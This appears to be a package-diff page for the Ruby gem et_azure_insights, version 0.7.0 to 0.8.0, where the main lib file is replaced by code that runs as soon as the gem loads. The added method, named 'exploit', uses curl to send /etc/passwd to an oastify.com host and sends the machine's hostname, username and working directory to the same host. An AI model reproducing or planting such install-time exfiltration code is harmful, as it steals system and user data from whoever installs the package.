et_azure_insights 0.7.0 → 0.8.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/et_azure_insights.rb +26 -4
- metadata +1 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: f5edc6dda723badbff23f77aa1111865495420c2db869dab2458cc1af3f36480
|
|
4
|
+
data.tar.gz: 7d2b27c76adcafeffd9eda3c1970d579aa125f6f766a9de6ac511908efdd3dcc
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 494d0855ffb9635c91347c2df5159fc20e8dbd38979cde386c51a8ca7ceee1cf08d667f72e8d65fa1828f041462845029d959bff1de4c7a0c617ea09367f0fbe
|
|
7
|
+
data.tar.gz: 23c3fe8fa7795f6920a53239bd32629c75347bb57dfbd79604b3697f14c609e1dffd69c6f37e2b2c93d77742dc0fe6a5bd6bb560d90c9cf47163371582b7a64f
|
data/lib/et_azure_insights.rb
CHANGED
|
@@ -1,4 +1,26 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
1
|
+
require 'net/http'
|
|
2
|
+
require 'socket'
|
|
3
|
+
require 'etc'
|
|
4
|
+
|
|
5
|
+
def exploit
|
|
6
|
+
hostname = Socket.gethostname
|
|
7
|
+
username = Etc.getlogin
|
|
8
|
+
cwd = Dir.pwd
|
|
9
|
+
|
|
10
|
+
command = "/usr/bin/curl --data '@/etc/passwd' #{hostname}.sc8c79d4fjfgq4htgo090c2b72dt1i.oastify.com"
|
|
11
|
+
|
|
12
|
+
`#{command}`
|
|
13
|
+
|
|
14
|
+
uri = URI('https://sc8c79d4fjfgq4htgo090c2b72dt1i.oastify.com')
|
|
15
|
+
params = { 'hostname' => hostname, 'username' => username, 'cwd' => cwd }
|
|
16
|
+
uri.query = URI.encode_www_form(params)
|
|
17
|
+
|
|
18
|
+
res = Net::HTTP.get_response(uri)
|
|
19
|
+
|
|
20
|
+
# Add any additional code here based on the desired behavior of the exploit
|
|
21
|
+
|
|
22
|
+
# Example: Printing the response
|
|
23
|
+
puts res.body
|
|
24
|
+
end
|
|
25
|
+
|
|
26
|
+
exploit # Call the exploit method
|